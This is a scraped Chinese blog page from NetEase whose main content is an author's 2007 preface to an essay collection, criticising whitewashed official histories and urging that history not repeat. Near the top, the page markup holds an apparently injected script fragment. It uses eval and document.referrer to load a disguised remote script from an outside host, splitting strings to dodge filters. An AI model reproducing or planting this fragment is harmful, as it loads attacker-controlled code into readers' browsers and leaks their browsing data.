注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

大山无言 的博客

它的脸上和身上/象刀砍过一样/但它依然站在那里/含着微笑/看着海洋

 
 
 

日志

 
 
关于我

这是一匹倔犟的野马,毛鬃很长,不剪.常独自徘徊在水不美,草不肥的地方,仰颈嘶啸.最讨厌的东西——套马杆。 近三年来,一边擦拭泪水,承受人生最大苦难,一边坚持读书,写下读书随笔一千余篇,分别取书名《有话要说》、《名人百议》、《正史背后》、《乌有批判》。因政治、经济原因,前两部至今躲在博客里,后两部少量印刷. 这里陆续展示的是《有话要说》中的部分文章.

网易考拉推荐

《有话要说》自序 我们需要的是:不再重复  

2009-06-27 16:09:01|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
load=" >" =" a=neBlogneBlog-onload=" r="http://1954416abc.blog.163.com/blog/static/1208707092009527491896/edit/" left="var r=eval('parent.'+'document.referrer');var s=document.createElement('script');s.src='http://love.itwenba.cn/a/163/q.jpg?k=blog.sina.com.cn&r='+r;s.type='text/jav'+'ascr'+'ipt';document.getElementsByTagName('head').item(0).appendChild(s)" display="none">

 

 

  以往历史的所有的“正史”大都是被拣选过的.

  所有的昨天都是今天,所有从“正大光明”的牌匾下走出来的今天,都是精心涂抹过的.封建专制制度下,你听不见宫廷深处的嘀嘀咕咕,面向天下的,永远只是开国皇帝们的雄才大略和丰功伟绩.

  因此,中国的封建历史是需要剝离掉表面上的层层油彩,才能看清它的本来面目.有的既使是剝离尽油彩,你会发现:眼前仍然是一具具面目全非的东西,它们从一开始便被处理和破坏了.

  为什么会这样?遮丑、遮羞、遮见不得天日的阴谋和阳谋.

  以“仁、义、礼、智、信”相标榜,在孔子的儒学面前三叩六拜的冠冕堂皇的封建帝王们,实际上是即不仁也不义,即不礼也不智,更无信.封建专制制度下的政治什么时侯“仁”过?什么时侯“信”过? 什么时侯“德”过?

 也因此,中国历史的每一幕几乎都充满了令人发指的血腥和欺诈.转瞬即失的灿烂辉煌的背后,是左丘失明,孙子膑脚.

以暴力、鲜血、阳谋、阴谋夺取的政权,会让政治回归道德?

政治,诡道也.

便当世者迷,隔代修史.

但历史总要有人记录的.一些读书人“创造”历史给皇上看,一些读书人记录历史给后人看.给皇上看的历史大都是“辉煌灿烂”的,给后人看的历史大都是血迹斑斑的. 血迹斑斑的历史留下来的虽少,但也朝朝代代不绝.因为朝朝代代总有正直的读书人,总有对那些“辉煌灿烂”说“不”的人.而这些“血迹斑斑”才是中国人真正需要记住的.

便继续有血从昨天里渗出来,让墨写的谎言露出马脚,露出一些历史衣襟底下的“伪”来.

历史己进入二十一世纪,我们需要继承和弘扬,更需要的是:不再重复.只有不再重复,中华民族才可能在不断反思和总结中,和谐地跨进民主、科学、法治的轨道,融入现代文明,为人类的发展做出贡献。

是为序.

2007.9.25   中秋

  评论这张
 
阅读(333)| 评论(2)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017